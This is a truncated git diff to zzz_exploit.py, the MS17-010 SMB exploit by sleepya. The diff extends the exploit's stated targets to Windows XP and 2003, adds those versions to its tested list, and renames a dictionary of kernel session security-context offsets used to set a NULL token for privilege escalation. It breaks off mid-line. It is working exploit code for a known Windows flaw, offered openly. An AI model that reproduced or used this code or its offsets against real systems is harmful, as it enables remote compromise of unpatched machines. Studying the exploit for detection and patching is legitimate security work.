diff --git a/zzz_exploit.py b/zzz_exploit.py index 67e4920..8d93581 100644 --- a/zzz_exploit.py +++ b/zzz_exploit.py @@ -7,7 +7,7 @@ import socket import time ''' -MS17-010 exploit for Windows 7+ by sleepya +MS17-010 exploit for Windows XP and later by sleepya Note: - The exploit should never crash a target (chance should be nearly 0%) @@ -20,9 +20,13 @@ Tested on: - Windows 2008 R2 SP1 x64 - Windows 7 SP1 x64 - Windows 2008 SP1 x64 +- Windows 2003 R2 SP2 x64 +- Windows XP SP2 x64 - Windows 8.1 x86 - Windows 7 SP1 x86 - Windows 2008 SP1 x86 +- Windows 2003 SP2 x86 +- Windows XP SP3 x86 ''' USERNAME = '' @@ -89,14 +93,17 @@ If we can overwrite Token to NULL and UsePsImpersonateClient to true, a running to do all SMB operations. Note: fake Token might be possible, but NULL token is much easier. ''' -WIN7_64_INFO = { +########################### +# info for modify session security context +########################### +WIN7_64_SESSION_INFO = { 'SESSION_SECCTX_OFFSET': 0xa0, 'SESSION_ISNULL_OFFSET': 0xba, 'FAKE_SECCTX': pack('